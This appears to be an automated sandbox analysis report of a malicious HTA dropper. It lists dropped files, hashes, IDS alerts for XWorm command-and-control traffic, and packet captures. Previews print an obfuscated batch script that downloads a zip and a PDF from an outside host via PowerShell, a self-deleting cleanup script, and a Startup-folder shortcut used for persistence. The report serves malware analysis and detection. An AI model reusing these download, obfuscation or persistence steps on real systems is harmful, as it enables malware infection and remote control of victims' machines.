                                                                          SSDEEP:192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cbVcbSIljcbR:ceo4+rsCIlw
                                                                          MD5:FB8A14DD082A25B1F4DEFDC52B580E3F
                                                                          SHA1:105C5AD88284E01842CD12FC232EDA3547804E69
                                                                          SHA-256:0951CB9AAEB198EE9C5B59A53BEB402B867B2E6DC290E3E3ABB53B80051B2723
                                                                          SHA-512:EBDC2B5A63C2A332DF6F4F193F16924D78A392226CD25845EEB177D5C8A38203ADCEEB0C2C76BE010178559B3C7E70833B71674E3670A6D035E287F0318E8A0C
                                                                          Malicious:false
                                                                          Preview:05-10-2023 10:18:29:.---2---..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:18:29:.Closing File..05-10-

                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\26ce8a36-5882-4490-9462-afd40d8fd8a9.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                          Category:dropped
                                                                          Size (bytes):1407294
                                                                          Entropy (8bit):7.97605879016224
                                                                          Encrypted:false
                                                                          SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                          MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                          SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                          SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                          SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                          Malicious:false
                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\9d6fdc83-60eb-422c-80e8-e73341f869a4.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                          Category:dropped
                                                                          Size (bytes):1419751
                                                                          Entropy (8bit):7.976496077007677
                                                                          Encrypted:false
                                                                          SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                          MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                          SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                          SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                          SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                          Malicious:false
                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\e27ba31f-c017-427e-a764-467ff1186afa.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                          Category:dropped
                                                                          Size (bytes):758601
                                                                          Entropy (8bit):7.98639316555857
                                                                          Encrypted:false
                                                                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                          MD5:3A49135134665364308390AC398006F1
                                                                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                          Malicious:false
                                                                          Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\fe2d35fc-33b9-4881-9ffc-a66b38d599e7.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                          Category:dropped
                                                                          Size (bytes):386528
                                                                          Entropy (8bit):7.9736851559892425
                                                                          Encrypted:false
                                                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                          Malicious:false
                                                                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                          C:\Users\user\AppData\Local\Temp\cleanup.bat

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\mshta.exe
                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):183
                                                                          Entropy (8bit):4.808485235762564
                                                                          Encrypted:false
                                                                          SSDEEP:3:mKDDCMN2RmDNv2lOCHyg4E2J5xAIhMS2LFM2H5+Vovu9LsB8SAlOCHyg4E2J5xAK:hWK2ON+cCHhJ23fhnKFM0qo29LiXCHh0
                                                                          MD5:FF63BD613DE8A2A8EAE0D47FC5BBD08A
                                                                          SHA1:99788C0FA5ECCB289F6E2321125400DC6CFB58B4
                                                                          SHA-256:0D572935FB9C96BC83715E6EDD0D7CAE25F2101667925B79D0A305E1ABD8D381
                                                                          SHA-512:02707A408A668D384DF149CDA2F91B7B363870B1FC2DD09ABB851037AA4EC3B657F78EFFE2F852477F20CBD7B90BB73C46292B441CB8280104AAFFA26E51DE93
                                                                          Malicious:false
                                                                          Preview:@echo off..timeout /t 90 >nul..del "C:\Users\user\AppData\Local\Temp\temp.bat"..del f.pdf..del msword.zip..del downloaded.hta..del "C:\Users\user\AppData\Local\Temp\cleanup.bat"..

                                                                          C:\Users\user\AppData\Local\Temp\f.pdf

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:PDF document, version 1.4, 4 pages
                                                                          Category:dropped
                                                                          Size (bytes):276302
                                                                          Entropy (8bit):7.83317883790279
                                                                          Encrypted:false
                                                                          SSDEEP:6144:f7TySmt1MtVReLAaFQfz33NKy1zdp7Vum1S6rpn7p5Xc7:jGSFUAaFInNKy1Dn1fn7plc7
                                                                          MD5:950557F66ABA12BF2797E9FC134B3DAA
                                                                          SHA1:B882BB3263A69B482C9914A6E2ADA437512C06BD
                                                                          SHA-256:7EC84FF21725BFFDE7F1301C5C3C34810FB1F92D690DBDDE3716860891E0588F
                                                                          SHA-512:03213B75B8383196478F20D0031C8E075D11FED31B89671405E48596F477955688AE234AE44A757E7931E4D5DF7846C644583FA2C60AC670596D219A99C88B91
                                                                          Malicious:true
                                                                          Preview:%PDF-1.4..%......1 0 obj..<< .. /BitsPerComponent 1 .. /ColorSpace 3 0 R .. /Height 3288 .. /Subtype /Image .. /Type /XObject .. /Width 2560 .. /Filter [.. /CCITTFaxDecode ].. .. /DecodeParms [.. << .. /BlackIs1 true .. /Columns 2560 .. /K -1 .. /Rows 3288 .. >>.. ].. .. /Length 2 0 R .. >>..stream..&.>.....m.F.....A.....d.......'d....r.d...9..x8..*.A....m...9...# U.a.Hs.f..@.....$..Xk w....nENS`f@....`...W.9....q.(.L).....`..M%..A...l.."m^@...B.g6...P....4.q..N...)...(......r..Jr......qY.H.D.v.Dq...$X.........T..$.g.^dH.A.9..A......Lz..d.l..A.C[.........*e....E....L.... ...........<.P...$...8k......................&..}...?...............s5...~........._........_...........H...hLP.<..3"...4...."....#.5\.?...3......A...S..y+.BJD.. b!......x(]......T. A.< ._O_P.%.Z......"sK.5..G...!q.H.I'..E.D=..!....%t......g.#.;.H.gA.8........F.j.....:^...Y...H...P`.A.!....e.'.Ma.i.}8M{. ...D. .!..B. ..v.z.p.i='K.J...#.

                                                                          C:\Users\user\AppData\Local\Temp\msword.zip

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                          Category:dropped
                                                                          Size (bytes):3802499
                                                                          Entropy (8bit):4.6033990571172305
                                                                          Encrypted:false
                                                                          SSDEEP:24576:cvQoCg23M7h2IqMNR4WbINxZAQlB+U0zUc:QQvg23M5R4WbI3LlAU0Uc
                                                                          MD5:AC1BB7433BD4A06FA226CFD057526675
                                                                          SHA1:A954C6F43448A85C209CA49408F02FF62A2EE08D
                                                                          SHA-256:CE5E1DBA0DFF8A00221D668D1E6B64419D57073F602CC12EEDFB8CCD46B403EB
                                                                          SHA-512:A0400A7A4C71C5725BF9295C7EB9F6E5C63C2ECA949F922C2A4C31C873EE72F595DBF70ED212CAE2B887E51B89D69F2446288227174A63F9A9429F1EBC888927
                                                                          Malicious:true
                                                                          Preview:PK..........\Y.F.%..:....5....msword.exe..|T.?~.G.l.E...4BP....(qA......f...*..@.9.h.&.....Zko.....[..J[+Q..@..Z........QW.a..............~...g.9..<...sf....#.M.$;.iJR.$.|...4...H....e-.....6eYm..+.Y}.}.w.b.J.........V....,.o....rJ.mL..[.f]..Lr.5uJ6......vL....<X0e0...b..Q.z.....) K.lK.....n.uIVK.%G.V....$.$.j.....'.VI..%[.W.....i....&.H.........Iz.2>..g..........<5HZ2X..........Du.:....'..h..sa.%i...K.T.......#.>...&.0i....V..F.....:qE..........V...yN..FZ..S......K....5.....X..;p.............uN.:........n#...YR...05..9M.a.l.......C..#x...O...G.H_.#EegL>&..C.Q..&%cdy=.F..[]/.B...q~.z....f..v..........r..s.\.......?.C.Q=..v.&.zNv..m.;xaL..D.).....r..@k.#.Y.802.|..3{Y.sm^a..~.<S]j..d..F-ThjU..:g..n....t.....Y....f^.,....eL..L.<..."=.........O...x....S(_...z..n.]bof......}.d.fu..U.p.[............X...4..mV.6+qIo.].l...jq.....r..z...`..5ZX.EUD.._.c..v...s.*42...._,.%(.q........@.g.....T..];.....4.;..r46.:.Wl....XneO.....hc{.|...z.,j

                                                                          C:\Users\user\AppData\Local\Temp\msword\msword.exe

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):891289591
                                                                          Entropy (8bit):4.230074047814782
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:C744E054E4EF01832BBF43B81D397B61
                                                                          SHA1:3360299F013BCD729FD1993280B9304605457238
                                                                          SHA-256:4EC9AD5867629EBDC9655123B138CBE63F7ED1EDFF2022B493DD075BD06C4E3D
                                                                          SHA-512:4DAC02819D1F0B2A56FD1131BDD6B64821B40A3403111DCF5EC58CB688778E8293BC1D41693AA3DC369B0A63A9967FF0CD641F0A2AD8B2678A9E1A0079A523FD
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...2...B...8............@..................................(....@.................................4........@...o..............h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....o...@...p..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\temp.bat

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\mshta.exe
                                                                          File Type:ASCII text, with very long lines (858), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):3432
                                                                          Entropy (8bit):5.234062070088092
                                                                          Encrypted:false
                                                                          SSDEEP:96:/TdUe5HQK36ughbWko0bb3qiek2GsMfTqjLgA784kzc:/1iC6/Hok3ck2m+gA4pc
                                                                          MD5:D549E854FB2AAB68C75932BCF3A665B4
                                                                          SHA1:8A6B197876F71629D0D9203D07ECCE9AF74ED23B
                                                                          SHA-256:1EC09B7E61FA833273AC18D88FAC6A4A170EB9162E9EB22CF792501A5ADB80FC
                                                                          SHA-512:09DC0CA4747C9889E91444D81F169F23F8D06F4E4CCA8100DB0D6EB2CD7C0CD8B8B1A43F02CB3D32AD41A0B3FAEAA5F8CD51AE2099C2B47FEF2DD56DB6C6F6C7
                                                                          Malicious:true
                                                                          Preview:@%GhaE%e%QON%c%oVNlxhS%h%Ycc%o%TZSGZdTzsg% %mCRp%o%mYsfZpXBuP%f%dejTMv%f%rOYSefEO%..set url=https://myguyapp.com/msword.zip..s%fYUsbno%e%mHFqzLlvkW%t%hUBvKOQtW% %BtaDrsJcK%u%bwj%r%bjb%l%cpsWTx%=%CMyfaI%h%NNDC%t%SZG%t%sg%p%wytdXsH%s%XLfYRhO%:%bwaXJSZcr%/%vUI%/%K%m%MCJQ%y%wuBhlDQq%g%bvZ%u%uMfDTf%y%HvowO%a%g%p%gW%p%WuVdNidl%.%J%c%mQbubjWlWA%o%JHjbKI%m%SLrrGw%/%kgMFGJDia%m%iY%s%CyXf%w%AOQZxDh%o%JaMNppS%r%OFHHQzh%d%ogNI%.%CWIe%z%NvLL%i%nUqshO%p%ol%..set url2=https://myguyapp.com/f.pdf..s%lLMxI%e%E%t%HmFSG% %eShSGJ%u%ffAbYQ%r%jKPqgaqto%l%EMjcmqMfca%2%FoaxIpOlBa%=%tFP%h%QfOUPNjO%t%eJQcBi%t%T%p%E%s%cEBinqC%:%gpBCsoCKj%/%O%/%Sc%m%jxCVyoV%y%xupSDw%g%c%u%ZXfcFhQc%y%MTizciab%a%HajpQ%p%egxXS%p%GbeXqb%.%v%c%sOvJGeIi%o%iR%m%ghuPHIK%/%IyQ%f%Hy%.%jbNkg%p%wZavCJ%d%u%f%GZZx%..p%lq%o%rKw%w%rccL%e%MoQtMwm%r%KyfpjVP%s%UeGGJKVJuc%h%OLItsAkTl%e%SvXHsfY%l%xNn%l%qprygNiJ% %u%-%trOPn%W%riAGUqdCY%i%XJzeNiO%n%dADaL%d%vwEhbsFtTh%o%NVBUHaBrg%w%KgiWKgQqo%S%uUzQb%t%bckc%y%yQMRkxNH%l%RCyA%e%vwwwFI% %nLhuAftFS%H%SMhVFx%

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >), ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):99
                                                                          Entropy (8bit):4.883547380318454
                                                                          Encrypted:false
                                                                          SSDEEP:3:HRAbABGQaFyw3pYoCHyg4E2J5mJ17ufLOcsaYuPA/y:HRYF5yjoCHhJ23mf7YswIy
                                                                          MD5:5181215F817B44DA99B3B35E68C0A909
                                                                          SHA1:31E93314B55734C6F3DABCEC09A678C44C1A955A
                                                                          SHA-256:8958D88D33A80CCB9D4A60E44199AF593A314B2398115E6B44213F73B617CED9
                                                                          SHA-512:45E25CF7DBF290FBC6BCBDA8E90902FCBFC8DA000B5B03C49ECEBCE3E3A929BE33DBC270F37C8F2B6B66ED9722FC5EFF79F1D84549572EA7BC7061E7F337B884
                                                                          Malicious:true
                                                                          Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" ..

                                                                          \Device\Null

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\timeout.exe
                                                                          File Type:ASCII text, with very long lines (411), with CRLF line terminators, with overstriking
                                                                          Category:dropped
                                                                          Size (bytes):415
                                                                          Entropy (8bit):3.4014677996260176
                                                                          Encrypted:false
                                                                          SSDEEP:12:hYFTkv1ag7Y5PTgwQ6t6iQUAv/0U0DvsFyESnQBt1XtX:GFIdlQP8kW/0D0FVSnQb19X
                                                                          MD5:61E1CBA13946260690BB73DED66BDA6F
                                                                          SHA1:09BE31351D2EE985EB5D0676358A84BC5F89B8AC
                                                                          SHA-256:F0EB6C2E9F73CD4D7407D3E6B0ADADD4DCA1C23D725A5908208B4F7B748D8879
                                                                          SHA-512:BF4DA774430539C570CB86BE9C289C671CFD399B91AD79522BBB65099E7A90DCF5805B45B0A6D17C6A77E585099D74F9F9304CBA7F0D2A6EEB5D87FB47B96EF9
                                                                          Malicious:false
                                                                          Preview:..Waiting for 90 seconds, press a key to continue .....89..88..87..86..85..84..83..82..81..80..79..78..77..76..75..74..73..72..71..70..69..68..67..66..65..64..63..62..61..60..59..58..57..56..55..54..53..52..51..50..49..48..47..46..45..44..43..42..41..40..39..38..37..36..35..34..33..32..31..30..29..28..27..26..25..24..23..22..21..20..19..18..17..16..15..14..13..12..11..10.. 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

                                                                          Static File Info

                                                                          General

                                                                          File type:HTML document, ASCII text, with CRLF line terminators
                                                                          Entropy (8bit):4.547132968036531
                                                                          TrID:
                                                                          • HyperText Markup Language (12001/1) 40.67%
                                                                          • HyperText Markup Language (11501/1) 38.98%
                                                                          • HyperText Markup Language (6006/1) 20.35%
                                                                          File name:c2.hta
                                                                          File size:3'462 bytes
                                                                          MD5:3b3967433fe77e5b709e469d9635d707
                                                                          SHA1:21dfe527565c8d9c766458a48634b2d633e59076
                                                                          SHA256:bb4f26feac9120fd5104e555331bc9fbbab35a1b2874d61c241397dad73284a8
                                                                          SHA512:b64c0b22f46f74fd2b698d93e667f8f5d6b02e766ec8ce4664a3af8bc1baedf5a8f71a1e0c46ffb34e167711982d4bda1c8426a13351300a387047f943136684
                                                                          SSDEEP:48:wOvfTntHcmhdT1hnLU5Lo1fWKGUTF50H3/CO:w+rnJhV1hL6/LeQH3
                                                                          TLSH:4261AC1FDEE39F628932CA6349ABA80DDD9CC90B15508489750CCC4A7F7537CA8D16FA
                                                                          File Content Preview:<html>..<head>.. <title>BAT Downloader</title>.. <HTA:APPLICATION.. ID="downloadBatApp".. APPLICATIONNAME="BAT Downloader".. WINDOWSTATE="minimize".. BORDER="thin".. SCROLL="no".. SINGLEINSTANCE="yes".. /

                                                                          Network Behavior

                                                                          Suricata IDS Alerts

                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-12-12T19:10:36.041153+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.849728193.26.115.217007TCP
                                                                          2024-12-12T19:10:45.764994+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1193.26.115.217007192.168.2.849728TCP
                                                                          2024-12-12T19:10:45.764994+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21193.26.115.217007192.168.2.849728TCP

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 12, 2024 19:07:08.655844927 CET49708443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:08.655859947 CET44349708193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:08.655926943 CET49708443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:08.666148901 CET49708443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:08.666161060 CET44349708193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:09.951076031 CET44349708193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:09.951178074 CET49708443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:10.137773991 CET49708443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:10.137805939 CET44349708193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:10.138257027 CET44349708193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:10.138328075 CET49708443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:10.143276930 CET49708443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:10.187338114 CET44349708193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:10.490355968 CET44349708193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:10.490386963 CET44349708193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:10.490423918 CET49708443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:10.490441084 CET44349708193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:10.490449905 CET49708443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:10.490483999 CET49708443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:10.490539074 CET44349708193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:10.490583897 CET49708443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:10.492981911 CET49708443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:10.492994070 CET44349708193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:11.429455042 CET49710443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:11.429505110 CET44349710193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:11.429568052 CET49710443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:11.436352015 CET49710443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:11.436366081 CET44349710193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:12.718425035 CET44349710193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:12.718502998 CET49710443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:12.737925053 CET49710443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:12.737938881 CET44349710193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:12.738693953 CET44349710193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:12.783432007 CET49710443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:12.892533064 CET49710443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:12.939336061 CET44349710193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:13.250845909 CET44349710193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:13.250922918 CET44349710193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:13.250945091 CET44349710193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:13.250978947 CET49710443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:13.250998974 CET44349710193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:13.251008034 CET49710443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:13.299060106 CET49710443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:13.455355883 CET44349710193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:13.455399990 CET44349710193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:13.455418110 CET44349710193.26.115.21192.168.2.8
